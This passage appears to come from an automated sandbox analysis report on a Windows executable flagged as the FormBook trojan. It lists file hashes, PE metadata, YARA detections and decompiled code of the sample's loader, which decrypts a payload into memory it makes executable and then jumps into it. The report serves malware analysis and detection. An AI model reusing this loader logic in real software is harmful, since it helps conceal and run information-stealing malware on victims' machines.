c.4.4.6.a.b.8.1.e.c.0.!.n.S.M.F.p.X.g.L.e.7...e.x.e.....T.a.r.g.e.t.A.p.p.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Mon Mar 20 08:16:54 2023, 0x1205a4 type
                Category:dropped
                Size (bytes):18900
                Entropy (8bit):2.3412202074630377
                Encrypted:false
                SSDEEP:96:5gX8ia8+GYs8B27KZ76i7kyxIXA/SQgBW5jWInWIX4Ixh0Np0N:OsiWse2KZ6O3Iics1hwp0
                MD5:42552E94BDA4E1485A954B8B55A651B5
                SHA1:124BE5B5D035CEAD6A50D63374AE57FCA09C5385
                SHA-256:85661E7888F6D0C6FD18B0FB67BAEA916CA8B056499B6604A1A3A0C932CCED46
                SHA-512:34B4A64FAD8AD2AD18B708B72F18B1A7D05F6505E3A37C7377886A844DAD61D2A8F5BD5AEA0960A55278E709F5D7C42EBF2974BC2F38CF5A82CC77F50D450795
                Malicious:false
                Reputation:low
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8272
                Entropy (8bit):3.697352235557613
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNidJ6wVG6Ye6SU0ptYgmf4ST+pr089beBsfbrfKm:RrlsNij6wG6YjSU0ptYgmf4SOe6fr
                MD5:059199AC4AA46B1A33445A6DB140773F
                SHA1:868654FC28F3CF67BD214689C9B1445FF2B6E6EC
                SHA-256:226EAE7D6AB560CCD6C4130E86FF3D197FE046806D6DC57001690E5F33C036CC
                SHA-512:F9FA8D376829B41EF2E1CDE6D5E2724E22D7B0853B7346ADCFE9F764DD7EEAD3BD2A59607A53AC92AF13450FECB4C7BC2D751FF97F79514D77BDA9175FF71B02
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.6.8.<./.P.i.d.>.......
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4563
                Entropy (8bit):4.467950748170684
                Encrypted:false
                SSDEEP:48:cvIwSD8zsltJgtWI9ejkWgc8sqYjJ8fm8M4JKgJZFFU2o+q8V9Y+oiVLV+d:uITfdJxgrsqYiJK2os7p+d
                MD5:9CA07AE19FAE9D38FDBD6DB287835411
                SHA1:E7B49388F4FF0D839BEA17AE6B0E61756F3B8E70
                SHA-256:D406B8343ADFEC7A2D17F8AB468F70F565E065AC6639C3D090427BA5A62DB7E0
                SHA-512:0136276BB5496C1CC5D167AB479BED4FB03E852E0C81C70FEA40FF77AAC5CC56292155958441120DAB94A5F0638387E50421A848FA11CD3C1314462F7483D006
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1960887" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1572864
                Entropy (8bit):4.3089933357269405
                Encrypted:false
                SSDEEP:12288:yH5yRrVwR7+m1ZNyrG9oVUO0XCel/oUb+Ds/1J4aTznIvlGbC6:y5yRrVwR7+4ZNyjgXg
                MD5:BAB2124C54EC9F83224B104FA2691840
                SHA1:F3C37A6806EEA6A15793D18E7D04E67215BFF4DA
                SHA-256:955E99328EC83489BC31EA58783999C321FDC518FCCEF3952DA86CAF0EF3262E
                SHA-512:C18998D3D00B0093E16A815119EDD1E87293F6F7716BE0091A42238866B2C59A11B93BF50AF4905A7D1BD8DB15B445CC33EF90C9E1358487F3FBF0C055627345
                Malicious:false
                Reputation:low
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):24576
                Entropy (8bit):3.9026710856348417
                Encrypted:false
                SSDEEP:384:COHW5K5jjaMGgnVVeeDzeg1NKZtjIexFa1VsoSwX7hami/qfl/DWwsfWexOkRb+:CSYKmg/eeDzeeNYtjtHaPsoSwlami/qU
                MD5:5CEB46A595011B8B545F38E678BF9B1A
                SHA1:53BCBF964A9131EC36CB6C5417DAFA91BEABB0FA
                SHA-256:3B5F2218858C96FC19F74FB7FCA07251092E9A84A912748F62487FE21E98516A
                SHA-512:AF0633792AA9B94EB395027BEF02E2981AF6E4C31E49CF26AADAFB7EF4EE101B8640CCEA473B6D37D5174ECB2C2E4080A586F2B3ECC5647B4D6DAB898DA97E4E
                Malicious:false
                Reputation:low
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.309327975339631
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.98%
                • DOS Executable Generic (2002/1) 0.02%
                File name:nSMFpXgLe7.exe
                File size:184832
                MD5:80b40bd25a0ad14166dbbe17215b678a
                SHA1:94f9b752785949d23585e66b497a8c446ab81ec0
                SHA256:0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48
                SHA512:2e141f49fc827a47b57e9b2feaf2d40babc8c73636df3f5727708b5a54a8dcb9a8b77a71b3ca9b96334a262d380d6337e843bcb72d211f7607af284dec737385
                SSDEEP:3072:D7oHnT5GM1Em/A06sWMvYWAf7g/Gg6yw40R9aGovpwhX06JJWWNHh2qpsgAn9zfF:wHlT76iwzgOgp8R9aGovpwhX0AJDNHYX
                TLSH:5504AE36E601C075E2B242F5B26C177B843D2D342394A0A6F7E21AE56EF05F6B46931F
                File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.........l..}...}...}.......}.......}.......}..Rich.}..................PE..L.....FD..........................................@........
                Icon Hash:00828e8e8686b000
                Entrypoint:0x4012b0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x4446DE12 [Thu Apr 20 01:04:18 2006 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:
                Instruction
                push ebx
                mov ebx, esp
                sub esp, 08h
                and esp, FFFFFFF0h
                add esp, 04h
                push ebp
                mov ebp, dword ptr [ebx+04h]
                mov dword ptr [esp+04h], ebp
                mov ebp, esp
                sub esp, 000000A8h
                push esi
                push edi
                xorps xmm0, xmm0
                movq qword ptr [ebp-67h], xmm0
                movq qword ptr [ebp-5Fh], xmm0
                movq qword ptr [ebp-6Fh], xmm0
                movq qword ptr [ebp-37h], xmm0
                movq qword ptr [ebp-2Fh], xmm0
                movdqa dqword ptr [ebp-70h], xmm0
                movq qword ptr [ebp-3Fh], xmm0
                movq qword ptr [ebp-0000009Ch], xmm0
                movq qword ptr [ebp-60h], xmm0
                mov dword ptr [ebp-50h], 1FA501ABh
                mov dword ptr [ebp-4Ch], 4B0AFDD1h
                movq xmm0, qword ptr [ebp-50h]
                movq qword ptr [ebp-70h], xmm0
                xorps xmm0, xmm0
                mov al, 48h
                mov byte ptr [ebp-68h], al
                movdqa dqword ptr [ebp-40h], xmm0
                movq qword ptr [ebp-30h], xmm0
                mov dword ptr [ebp-20h], 6C022C76h
                mov eax, dword ptr [ebp-20h]
                movq qword ptr [ebp-0Ch], xmm0
                xor eax, 0665931Ch
                mov dword ptr [ebp-1Ch], 9A7FE8EEh
                movq xmm0, qword ptr [ebp-20h]
                movq qword ptr [ebp-40h], xmm0
                xor dword ptr [ebp-3Ch], 0665931Ch
                mov dword ptr [ebp-40h], eax
                lea eax, dword ptr [ebp-40h]
                push eax
                mov dword ptr [ebp-10h], 2975CB0Ah
                mov ecx, dword ptr [ebp-10h]
                mov dword ptr [ebp-18h], 4A88C1BFh
                mov dword ptr [ebp-14h], 7628C1D7h
                sldt word ptr [eax]
                Programming Language:
                • [C++] VS2012 build 50727
                • [ASM] VS2012 build 50727
                • [LNK] VS2012 build 50727
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x2d138 | 0x2ce00 | False | 0.7525624564763231 | data | 7.324967441383678 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.


                Target ID:0
                Start time:09:16:53
                Start date:20/03/2023
                Path:C:\Users\user\Desktop\nSMFpXgLe7.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\nSMFpXgLe7.exe
                Imagebase:0x1140000
                File size:184832 bytes
                MD5 hash:80B40BD25A0AD14166DBBE17215B678A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Target ID:3
                Start time:09:16:53
                Start date:20/03/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208
                Imagebase:0xaa0000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high


                  Execution Graph

                  Execution Coverage:0.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:100%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
                  execution_graph 15737 11414e9 15740 11414f0 NtProtectVirtualMemory 15737->15740 15739 114156f 15740->15739

                  Control-flow Graph

                  C-Code - Quality: 48%
                  			_entry_(void* __eflags) {
                  				intOrPtr _v8;
                  				short _v14;
                  				long _v16;
                  				short _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				char _v45;
                  				short _v47;
                  				long _v51;
                  				short _v52;
                  				signed int _v60;
                  				signed int _v64;
                  				signed int _v68;
                  				signed int _v72;
                  				signed int _v76;
                  				void* _v80;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				char _v93;
                  				short _v95;
                  				long _v99;
                  				short _v100;
                  				short _v104;
                  				signed int _v108;
                  				char _v116;
                  				char _v124;
                  				char _v125;
                  				intOrPtr _v126;
                  				signed int _v128;
                  				long _v132;
                  				long _v136;
                  				short _v138;
                  				short _v142;
                  				char _v160;
                  				char _v172;
                  				void* __ebx;
                  				void* _t94;
                  				void* _t106;
                  				void* _t119;
                  				signed int _t121;
                  				void* _t127;
                  				void* _t133;
                  				void* _t142;
                  
                  				_t142 = __eflags;
                  				_t116 = _t133;
                  				_v8 =  *((intOrPtr*)(_t133 + 4));
                  				asm("xorps xmm0, xmm0");
                  				asm("movq [ebp-0x67], xmm0");
                  				asm("movq [ebp-0x5f], xmm0");
                  				asm("movq [ebp-0x6f], xmm0");
                  				asm("movq [ebp-0x37], xmm0");
                  				asm("movq [ebp-0x2f], xmm0");
                  				asm("movdqa [ebp-0x70], xmm0");
                  				asm("movq [ebp-0x3f], xmm0");
                  				asm("movq [ebp-0x9c], xmm0");
                  				asm("movq [ebp-0x60], xmm0");
                  				_v92 = 0x1fa501ab;
                  				_v88 = 0x4b0afdd1;
                  				asm("movq xmm0, [ebp-0x50]");
                  				asm("movq [ebp-0x70], xmm0");
                  				asm("xorps xmm0, xmm0");
                  				_v116 = 0x48;
                  				asm("movdqa [ebp-0x40], xmm0");
                  				asm("movq [ebp-0x30], xmm0");
                  				_v44 = 0x6c022c76;
                  				asm("movq [ebp-0xc], xmm0");
                  				_v40 = 0x9a7fe8ee;
                  				asm("movq xmm0, [ebp-0x20]");
                  				asm("movq [ebp-0x40], xmm0");
                  				_v72 = _v72 ^ 0x0665931c;
                  				_v76 = _v44 ^ 0x0665931c;
                  				_v28 = 0x2975cb0a;
                  				_v36 = 0x4a88c1bf;
                  				_v32 = 0x7628c1d7;
                  				asm("movq xmm0, [ebp-0x18]");
                  				asm("movq [ebp-0x38], xmm0");
                  				_v68 = _v68 ^ 0x0665931c;
                  				_v64 = _v64 ^ 0x0665931c;
                  				_v99 = 0;
                  				_v51 = 0;
                  				_v172 = 0;
                  				_v95 = 0;
                  				_v93 = 0;
                  				_v47 = 0;
                  				_v45 = 0;
                  				_v100 = 0;
                  				_v52 = 0;
                  				_v16 = 0;
                  				_v60 = _v28 ^ 0x0665931c;
                  				E011416B0(_t133,  &_v124, 9,  &_v76);
                  				_v160 = 0;
                  				_v142 = 0;
                  				_v138 = 0;
                  				asm("xorps xmm0, xmm0");
                  				asm("movq [ebp-0x92], xmm0");
                  				asm("movq [ebp-0x8a], xmm0");
                  				E01141260( &_v160,  &_v124);
                  				_t94 = E01141190(_t142,  &_v160);
                  				asm("xorps xmm0, xmm0");
                  				asm("movdqa [ebp-0x70], xmm0");
                  				asm("movq [ebp-0x60], xmm0");
                  				_v100 = 0;
                  				E011416B0(_t133,  &_v124, "true",  &_v76);
                  				asm("xorps xmm0, xmm0");
                  				asm("movq [ebp-0x60], xmm0");
                  				_v28 = 0x3bd91e43;
                  				_v108 = _v28;
                  				_v24 = 0x8958;
                  				asm("movdqa [ebp-0x70], xmm0");
                  				_v104 = _v24;
                  				asm("movq [ebp-0xa], xmm0");
                  				_v44 = 0x9b6333ad;
                  				_v40 = 0x2b96170;
                  				asm("movq xmm0, [ebp-0x20]");
                  				asm("movq [ebp-0x70], xmm0");
                  				_v36 = 0x8f765dfe;
                  				_v32 = 0x3c488869;
                  				asm("movq xmm0, [ebp-0x18]");
                  				_v100 = 0;
                  				_v14 = 0;
                  				asm("movq [ebp-0x68], xmm0");
                  				E011416B0(_t116,  &_v124, 0x16,  &_v76);
                  				E011410A0( &_v172, _t94,  &_v124, 0, 0);
                  				_v80 = 0;
                  				_t106 = L01141730();
                  				_t119 = 0;
                  				while(1) {
                  					_t121 =  *(_t119 + _t106) ^ 0x17cf51d6;
                  					_v128 = _t121;
                  					if(_t121 == 0xc9 && _t121 == 0xb3 && _v126 == _t121 && _v125 == 0xc7) {
                  						break;
                  					}
                  					_t119 = _t119 + 1;
                  					if(_t119 < 0x4000) {
                  						continue;
                  					} else {
                  						_t127 = _v80;
                  					}
                  					L7:
                  					_v132 = 0;
                  					_v136 = 0x2ca00;
                  					NtProtectVirtualMemory(0xffffffff,  &_v80,  &_v136, 0x40,  &_v132); // executed
                  					_v76 = _v76 ^ 0x17cf51d6;
                  					_v72 = _v72 ^ 0x17cf51d6;
                  					_v68 = _v68 ^ 0x17cf51d6;
                  					_v64 = _v64 ^ 0x17cf51d6;
                  					_v60 = _v60 ^ 0x17cf51d6;
                  					E011416B0(_t116, _t127, 0x2ca00,  &_v76); // executed
                  					_t80 = _t127 + 0x21760; // 0x21760
                  					 *_t80();
                  					return 0;
                  				}
                  				_t127 = _t119 + _t106;
                  				_v80 = _t127;
                  				goto L7;
                  			}

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0114153B
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 95698347a203cdd392f88141b009f174b4dc41bcb4a7bfbcd84c51c2d6bca374
                  • Instruction ID: 3f736185787b5484694d3cbad46a7fe30203c885e76e7e42167121dd815fd896
                  • Opcode Fuzzy Hash: 95698347a203cdd392f88141b009f174b4dc41bcb4a7bfbcd84c51c2d6bca374
                  • Instruction Fuzzy Hash: D18103B1C1079DAADF50CFE4DC81AEEBB74BF59300F24421AE904B7251EBB466858B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 26 11414e9 27 11414f0-11414ff 26->27 28 1141511-1141518 27->28 29 1141501-1141504 27->29 28->27 31 114151a 28->31 29->28 30 1141506-1141509 29->30 30->28 33 114150b-114150f 30->33 32 114151d-114156a NtProtectVirtualMemory call 11416b0 31->32 36 114156f-1141584 32->36 33->28 35 1141585-114158b 33->35 35->32
                  C-Code - Quality: 58%
                  			E011414E9(void* __eax, void* __ebx, void* __ecx) {
                  				void* _t25;
                  				void* _t35;
                  				void* _t37;
                  				signed int _t39;
                  				void* _t41;
                  				void* _t43;
                  
                  				_t37 = __ecx;
                  				_t35 = __ebx;
                  				_t25 = __eax;
                  				while(1) {
                  					_t39 =  *(_t37 + _t25) ^ 0x17cf51d6;
                  					 *(_t43 - 0x74) = _t39;
                  					if(_t39 == 0xc9 && _t39 == 0xb3 &&  *((intOrPtr*)(_t43 - 0x72)) == _t39 &&  *((char*)(_t43 - 0x71)) == 0xc7) {
                  						break;
                  					}
                  					_t37 = _t37 + 1;
                  					if(_t37 < 0x4000) {
                  						continue;
                  					} else {
                  						_t41 =  *(_t43 - 0x44);
                  					}
                  					L7:
                  					 *(_t43 - 0x78) = 0;
                  					 *(_t43 - 0x7c) = 0x2ca00;
                  					NtProtectVirtualMemory(0xffffffff, _t43 - 0x44, _t43 - 0x7c, 0x40, _t43 - 0x78); // executed
                  					 *(_t43 - 0x40) =  *(_t43 - 0x40) ^ 0x17cf51d6;
                  					 *(_t43 - 0x3c) =  *(_t43 - 0x3c) ^ 0x17cf51d6;
                  					 *(_t43 - 0x38) =  *(_t43 - 0x38) ^ 0x17cf51d6;
                  					 *(_t43 - 0x34) =  *(_t43 - 0x34) ^ 0x17cf51d6;
                  					 *(_t43 - 0x30) =  *(_t43 - 0x30) ^ 0x17cf51d6;
                  					E011416B0(_t35, _t41, 0x2ca00, _t43 - 0x40); // executed
                  					_t22 = _t41 + 0x21760; // 0x21760
                  					 *_t22();
                  					return 0;
                  				}
                  				_t41 = _t37 + _t25;
                  				 *(_t43 - 0x44) = _t41;
                  				goto L7;
                  			}

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0114153B
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: ad54def11ce724fa2658c867b4fd5dea19d6f8a8ceec973942de66c2b6f0cd91
                  • Instruction ID: d228cab0cb1a578c338f61e9dace1940d7407e459adc66f8b9bebed14370d531
                  • Opcode Fuzzy Hash: ad54def11ce724fa2658c867b4fd5dea19d6f8a8ceec973942de66c2b6f0cd91
                  • Instruction Fuzzy Hash: 041130B1C0865C6BEF68CAB4EC81ADEBB74FB01624F74425DDA22A7192D37125458F81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0114FE87(void* __ebx, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				char _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				char _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				char _v52;
                  				short _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				char _v68;
                  				short _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				char _v84;
                  				short _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				char _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				char _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				char _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				char _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				char _v164;
                  				short _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				char _v184;
                  				short _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				char _v204;
                  				short _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				char _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				char _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				char _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				char _v284;
                  				intOrPtr _v288;
                  				char _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				char _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				char _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				char _v372;
                  				short _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				char _v404;
                  				short _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				char _v436;
                  				short _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				char _v468;
                  				short _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				char _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				char _v532;
                  				short _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				char _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				char _v568;
                  				short _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				char _v604;
                  				short _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				char _v640;
                  				short _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				char _v684;
                  				short _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				char _v728;
                  				short _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
